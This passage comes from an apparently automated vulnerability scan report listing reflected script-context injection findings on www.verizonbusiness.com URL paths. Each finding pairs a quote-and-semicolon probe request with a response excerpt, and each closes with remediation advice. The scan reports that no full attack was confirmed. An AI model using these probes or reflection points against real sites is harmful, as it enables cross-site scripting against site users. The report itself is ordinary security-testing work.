Date: Wed, 17 Nov 2010 00:44:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products71c7e";0e5d8892147/networking/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.222. http://www.verizonbusiness.com/Products/networking/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93e75'%3b9df3f74ce44 was submitted in the REST URL parameter 1. This input was echoed as 93e75';9df3f74ce44 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products93e75'%3b9df3f74ce44/networking/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:27 GMT
Content-Type: text/html
Content-Length: 40638
Date: Wed, 17 Nov 2010 00:44:27 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:27 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products93e75';9df3f74ce44/networking/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.223. http://www.verizonbusiness.com/Products/networking/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f49c7'%3b3913a7f4d4a was submitted in the REST URL parameter 2. This input was echoed as f49c7';3913a7f4d4a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networkingf49c7'%3b3913a7f4d4a/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:16 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42305
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Products/networkingf49c7';3913a7f4d4a/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.224. http://www.verizonbusiness.com/Products/networking/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be8eb"%3bea880fc7b5 was submitted in the REST URL parameter 2. This input was echoed as be8eb";ea880fc7b5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networkingbe8eb"%3bea880fc7b5/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:53 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42301
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:53 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
atch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/networkingbe8eb";ea880fc7b5/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.225. http://www.verizonbusiness.com/Products/networking/access/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/access/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9df75'%3b2033e1e27fa was submitted in the REST URL parameter 1. This input was echoed as 9df75';2033e1e27fa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products9df75'%3b2033e1e27fa/networking/access/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:41 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40652
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products9df75';2033e1e27fa/networking/access/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.226. http://www.verizonbusiness.com/Products/networking/access/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/access/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ad91"%3b05112381dc2 was submitted in the REST URL parameter 1. This input was echoed as 7ad91";05112381dc2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products7ad91"%3b05112381dc2/networking/access/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:32 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40652
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products7ad91";05112381dc2/networking/access/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEME
...[SNIP]...

1.227. http://www.verizonbusiness.com/Products/networking/access/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/access/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cba27'%3bc7cab3e456 was submitted in the REST URL parameter 2. This input was echoed as cba27';c7cab3e456 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networkingcba27'%3bc7cab3e456/access/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:53 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42317
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:53 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/networkingcba27';c7cab3e456/access/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.228. http://www.verizonbusiness.com/Products/networking/access/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/access/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eea84"%3bb0aa480eb99 was submitted in the REST URL parameter 2. This input was echoed as eea84";b0aa480eb99 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networkingeea84"%3bb0aa480eb99/access/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:47 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42319
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:47 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
atch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/networkingeea84";b0aa480eb99/access/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBM
...[SNIP]...

1.229. http://www.verizonbusiness.com/Products/networking/access/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/access/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8a410"%3b13fa2fcc469 was submitted in the REST URL parameter 3. This input was echoed as 8a410";13fa2fcc469 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking/access8a410"%3b13fa2fcc469/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:58 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:58 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
{}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/networking/access8a410";13fa2fcc469/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.230. http://www.verizonbusiness.com/Products/networking/access/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/access/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4fef7'%3b4cfbb2f24a9 was submitted in the REST URL parameter 3. This input was echoed as 4fef7';4cfbb2f24a9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking/access4fef7'%3b4cfbb2f24a9/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:08 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/networking/access4fef7';4cfbb2f24a9/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.231. http://www.verizonbusiness.com/Products/networking/internet/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/internet/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ed3a"%3b1481fe7d081 was submitted in the REST URL parameter 1. This input was echoed as 1ed3a";1481fe7d081 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products1ed3a"%3b1481fe7d081/networking/internet/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:19 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40658
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:19 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:19 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products1ed3a";1481fe7d081/networking/internet/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELE
...[SNIP]...

1.232. http://www.verizonbusiness.com/Products/networking/internet/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/internet/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7675e'%3b3ca23e0c757 was submitted in the REST URL parameter 1. This input was echoed as 7675e';3ca23e0c757 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products7675e'%3b3ca23e0c757/networking/internet/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:45 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40656
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products7675e';3ca23e0c757/networking/internet/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.233. http://www.verizonbusiness.com/Products/networking/internet/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/internet/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3caf0"%3b22325909194 was submitted in the REST URL parameter 2. This input was echoed as 3caf0";22325909194 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking3caf0"%3b22325909194/internet/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:13 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42321
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
atch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/networking3caf0";22325909194/internet/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SU
...[SNIP]...

1.234. http://www.verizonbusiness.com/Products/networking/internet/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/internet/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88f1e'%3beb3918f56c5 was submitted in the REST URL parameter 2. This input was echoed as 88f1e';eb3918f56c5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking88f1e'%3beb3918f56c5/internet/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:45:26 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
